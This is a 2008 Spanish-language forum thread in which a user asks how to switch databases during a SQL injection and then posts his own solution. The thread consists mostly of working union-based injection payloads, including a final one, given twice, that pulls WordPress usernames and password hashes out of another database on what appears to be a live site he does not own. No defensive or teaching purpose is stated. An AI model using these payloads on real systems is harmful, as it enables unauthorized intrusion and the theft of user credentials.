SOLUCIONADO ¿Como Selecionar Una BD Distinta Con "USE", en una Inyeccion SQL?

Iniciado por OzX, 19 Diciembre 2008, 23:05 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

OzX

19 Diciembre 2008, 23:05 PM Ultima modificación: 19 Diciembre 2008, 23:23 PM por OzX
Hi¡
Bueno, al grano
Tengo una web que tiene muchas base de datos (gracias a information schema schemata).
Llamemosla

db1
db2
db3
db4

La web trabaja con al db1, por lo cual si yo hago algun

Código [Seleccionar]
union+select+all+1,2,campo_que_no_existe,3+from+tabla.

me saldria
Table 'db1.campo_que_no_existe' doesn't exist


Ahora bien yo tengo las tablas y los campos de todas las base de datos, gracias al information schema (again XD').

Pero si yo intento hacer una consulta me dice que no existe la tabla ni el campo ni nada, pues claro estoy intentando hacer una peticion a la db2, pero esta por defecto las hace a las db1.


ahora bien leyendo y preguntando, descrubri el "USE DB", que sirve para selecionar una base de datos y luego hacer la consulta.

http://dev.mysql.com/doc/refman/5.0/es/use.html

Por EJ
Código [Seleccionar]
mysql> USE db1;
mysql> SELECT COUNT(*) FROM mytable;   # selects from db1.mytable
mysql> USE db2;
mysql> SELECT COUNT(*) FROM mytable;   # selects from db2.mytable


MI Problema es¡¡¡

¿Como C"·$%&/? Combino la Sentencia USE en una Inyeccion SQL?


Asi no Funciona (Aunque Cambie el valor de la db a char o hexsql o dejo asi para que se entienda mejor)
and+1=0+union+select+all+1,2,3+from+wp_users+use+wordpress_cri

o... tampoco
and+1=0++use+wordpress_cri+and+union+select+all+1,2,3+from+wp_users


Espero que me puedan Ayudar :D

Saludos¡
OzX¡

concat(user_login,user_pass) <= CAMPOS
wordpres.cri <= db
wp_users <= tabla de la db
EDITADO LO LOGRE¡
+and+1=0+union+select+all+1,2,3,concat(user_login,user_pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wordpress_cri.wp_users

:d



OzX

#1
19 Diciembre 2008, 23:22 PM
LO SOLUCIONEEEEEEEEEEEEEEEEEEEE


tan estupido pordios, tenia el resultado hay¡¡¡

pues me di cuenta que el mismo information schema, es una db separada tonce me crujio la teja
tonce provemos

information_schema.tables

si information_schema <= es la db
y .tables <= es la tabla

tonce cambiemos eso y¡
+and+1=0+union+select+all+1,2,3,concat(user_login,user_pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wordpress_cri.wp_users


SHAN¡ asi puedo ver la informacion de las otras DB¡

jawjwaj wn duro las cago pero me salio XD¡

gracias a las 10 visitas q vieron el post XD¡
Imprimir
Ir Arriba Páginas1
Acciones del Usuario